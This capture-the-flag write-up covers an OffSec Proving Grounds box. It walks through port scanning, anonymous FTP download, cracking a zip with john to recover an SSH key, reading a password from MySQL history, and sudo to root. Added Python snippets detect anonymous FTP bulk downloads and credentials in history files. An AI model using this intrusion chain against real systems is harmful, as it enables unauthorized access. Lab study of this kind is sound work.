
FunBox Rookie

This is my write-up for FunboxEasyEnum (see original submission) on OffSec Proving Grounds.

This room is a CTF-style room.

I will try to go deep into the technical things we do in this room.


1. Enum

  • Let's start the box and get its IP

Getting the IP

  • Export the IP as a shell variable so we can reuse it easily
export IP=192.168.118.107

## Test to see if the IP is correct
echo $IP
  • Start the port scan
Port Scan
## Create a directory to store the scan results
mkdir nmap

## Start a default nmap scan
nmap -sC -sV -vvv -oN nmap/default_scan $IP

## Start a rustscan for faster all port scan
rustscan -a $IP -- -oN nmap/rustscan $IP
Rustscan result
PORT   STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
  • The target is running a web server; we can visit it to see the default page.

  • Visit /robots.txt to see whether the website is trying to hide any directories

curl http://$IP/robots.txt
Disallow: /logs/
  • But that was a dead end. Since the target is running FTP, we can try logging in as anonymous to see if it works
FTP anonymous login
ftp -p $IP
Connected to 192.168.118.107.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.118.107]
Name (192.168.118.107:minhnq): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.49.118 !
230-
230-The local time is: Thu Dec 02 04:04:34 2021
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.

## Listing the files
ftp> ls
227 Entering Passive Mode (192,168,118,107,159,75).
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
226 Transfer complete

## Getting all the files
ftp> mget *
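From the defender's side, the session above is exactly what an FTP transfer log should make visible: one remote host authenticating anonymously and pulling every file on the share. The following is an added example, not part of the original write-up. It parses the wu-ftpd xferlog format that ProFTPD's TransferLog directive writes and flags hosts that download several files anonymously. The SAMPLE_XFERLOG lines are constructed to resemble what the session above would record; the timestamps, server-side paths and the second client 10.0.0.5 are assumptions.

```python
"""Parse an xferlog-style FTP transfer log and flag anonymous downloads.

Added example, not part of the original write-up.  ProFTPD's TransferLog
uses the wu-ftpd xferlog format; SAMPLE_XFERLOG below is constructed to
resemble what the anonymous session in the write-up would record
(timestamps, paths and the client 10.0.0.5 are assumptions).
"""
import re
from collections import defaultdict

# xferlog fields: date(5 tokens) transfer-seconds remote-host bytes path
# transfer-type(a/b) special-flag(C/U/T/_) direction(i/o/d) access-mode(a/g/r)
# user service auth-method(0/1) auth-user-id completion(c/i)
XFERLOG_RE = re.compile(
    r"^(?P<date>\w{3} \w{3} +\d+ \d{2}:\d{2}:\d{2} \d{4}) "
    r"(?P<secs>\d+) (?P<host>\S+) (?P<bytes>\d+) (?P<path>\S+) "
    r"(?P<type>[ab]) (?P<flag>[CUT_]) (?P<dir>[iod]) (?P<mode>[agr]) "
    r"(?P<user>\S+) (?P<service>\S+) (?P<auth>[01]) (?P<authuid>\S+) "
    r"(?P<status>[ci])$"
)

# Constructed sample log: three anonymous downloads from one host, then an
# upload and a failed (incomplete, status 'i') download by a real user.
SAMPLE_XFERLOG = """\
Thu Dec  2 04:05:01 2021 1 192.168.49.118 1477 /srv/ftp/anna.zip b _ o a anonymous@192.168.49.118 ftp 0 * c
Thu Dec  2 04:05:01 2021 1 192.168.49.118 1477 /srv/ftp/tom.zip b _ o a anonymous@192.168.49.118 ftp 0 * c
Thu Dec  2 04:05:02 2021 1 192.168.49.118 170 /srv/ftp/welcome.msg a _ o a anonymous@192.168.49.118 ftp 0 * c
Thu Dec  2 09:12:44 2021 3 10.0.0.5 52000 /home/tom/report.pdf b _ i r tom ftp 0 * c
Thu Dec  2 09:13:10 2021 0 10.0.0.5 1477 /srv/ftp/bud.zip b _ o r tom ftp 0 * i
"""


def parse_xferlog(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = XFERLOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["bytes"] = int(rec["bytes"])
            records.append(rec)
    return records


def anonymous_downloads(records):
    """Completed outbound transfers made under anonymous access mode ('a')."""
    return [r for r in records
            if r["mode"] == "a" and r["dir"] == "o" and r["status"] == "c"]


def summarize_by_host(records):
    """Per remote host: file names pulled anonymously and total bytes."""
    summary = defaultdict(lambda: {"files": [], "bytes": 0})
    for r in anonymous_downloads(records):
        entry = summary[r["host"]]
        entry["files"].append(r["path"].rsplit("/", 1)[-1])
        entry["bytes"] += r["bytes"]
    return dict(summary)


def bulk_anonymous_hosts(records, min_files=2):
    """Hosts that pulled at least min_files distinct files anonymously,
    i.e. the bulk-download pattern an alert should catch."""
    return sorted(h for h, e in summarize_by_host(records).items()
                  if len(set(e["files"])) >= min_files)


if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_XFERLOG)
    for host, e in summarize_by_host(recs).items():
        print(f"{host}: {len(e['files'])} files, {e['bytes']} bytes -> {e['files']}")
    print("bulk anonymous downloaders:", bulk_anonymous_hosts(recs))
```

The access-mode column is the important one: `a` means the session was anonymous, so the check does not depend on the username string. If anonymous access is not needed at all, the cleaner fix is disabling it in the ProFTPD configuration rather than alerting on it.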
  • We can use john, or in this case zip2john, to crack all the files and see what information they give us

  • Eventually, when cracking tom.zip, we will find something useful

zip2john tom.zip > tom.hash

john --wordlist=/usr/share/wordlists/rockyou.txt tom.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire (tom.zip/id_rsa)
1g 0:00:00:00 DONE (2021-10-26 17:34) 100.0g/s 70400p/s 70400c/s 70400C/s sunshine1..nichole
Use the "--show" option to display all of the cracked passwords reliably
Session completed
  • With the passphrase we just found, unzip tom.zip to get id_rsa

2. Foothold

  • SSH login as user tom
ssh -i id_rsa tom@$IP -t 'bash --noprofile'

3. PrivEsc

  • Looking around in tom's home directory
tom@funbox2:~$ ls -la
total 40
drwxr-xr-x 5 tom tom 4096 Dec 2 04:11 .
drwxr-xr-x 3 root root 4096 Jul 25 2020 ..
-rw------- 1 tom tom 0 Oct 14 2020 .bash_history
-rw-r--r-- 1 tom tom 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 tom tom 3771 Apr 4 2018 .bashrc
drwx------ 2 tom tom 4096 Dec 2 04:11 .cache
drwx------ 3 tom tom 4096 Jul 25 2020 .gnupg
-rw-r--r-- 1 tom tom 33 Dec 2 03:55 local.txt
-rw------- 1 tom tom 295 Jul 25 2020 .mysql_history
-rw-r--r-- 1 tom tom 807 Apr 4 2018 .profile
drwx------ 2 tom tom 4096 Jul 25 2020 .ssh
  • The file .mysql_history looks interesting
tom@funbox2:~$ cat .mysql_history 
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
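The `_HiStOrY_V2_` header and the `\040` sequences mean this file was written by libedit, which the MySQL client on Debian links against: every space and non-printable byte is stored as a three-digit octal escape. The following is an added example, not part of the original write-up. It decodes such a history file and flags entries that are likely to carry a literal secret, which is the kind of check a hardening script can run over home directories before an attacker reads them. SAMPLE_HISTORY reproduces the file shown above; the credential patterns are a heuristic of my own.

```python
r"""Decode a libedit history file (as written by the MySQL client) and flag
entries that may embed credentials.

Added example, not part of the original write-up.  libedit history files
start with `_HiStOrY_V2_` and escape spaces and other non-printables as
\NNN octal sequences; a literal backslash is stored as \\.  SAMPLE_HISTORY
is the .mysql_history from the write-up; CREDENTIAL_PATTERNS is an assumed
heuristic, tune it to the schema in use.
"""
import re

# \NNN (three octal digits) or \\ (escaped backslash), decoded in one pass
LIBEDIT_ESCAPE = re.compile(r"\\([0-7]{3}|\\)")

SAMPLE_HISTORY = r"""_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
"""

# Statements that routinely carry a secret as a literal (assumed heuristic).
CREDENTIAL_PATTERNS = [
    (re.compile(r"(?i)\bidentified\s+by\b"), "IDENTIFIED BY literal"),
    (re.compile(r"(?i)\bpassword\s*\("), "PASSWORD() call"),
    (re.compile(r"(?i)\bset\s+password\b"), "SET PASSWORD"),
    (re.compile(r"(?i)\binsert\s+into\b.*\("), "INSERT with literal values"),
]


def decode_libedit_line(line: str) -> str:
    """Turn one escaped history line back into the command that was typed."""
    def repl(m):
        tok = m.group(1)
        return "\\" if tok == "\\" else chr(int(tok, 8))
    return LIBEDIT_ESCAPE.sub(repl, line)


def load_history(text: str):
    """Return the decoded entries, dropping the header and blank lines."""
    lines = text.splitlines()
    if lines and lines[0] == "_HiStOrY_V2_":
        lines = lines[1:]
    return [decode_libedit_line(line) for line in lines if line.strip()]


def find_credential_entries(entries):
    """(entry, reason) for every entry matching one of the patterns."""
    hits = []
    for entry in entries:
        for pattern, why in CREDENTIAL_PATTERNS:
            if pattern.search(entry):
                hits.append((entry, why))
                break
    return hits


if __name__ == "__main__":
    history = load_history(SAMPLE_HISTORY)
    for entry, why in find_credential_entries(history):
        print(f"{why}: {entry}")
```

Running it over the sample reports only the `insert into support (tom, xx11yy22!);` line. The lasting fix is to keep secrets out of the history in the first place: the MySQL client honours `MYSQL_HISTFILE=/dev/null`, and an existing history file should simply be removed once it has been reviewed, as the empty `.bash_history` in the same directory suggests someone already did for the shell.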
  • We can see that tom's password is xx11yy22!
tom@funbox2:~$ sudo -l
[sudo] password for tom:
Matching Defaults entries for tom on funbox2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
(ALL : ALL) ALL
  • Become root and get the flags
Getting the flags
sudo -s

cat /home/tom/local.txt /root/proof.txt
[REDACTED]
[REDACTED]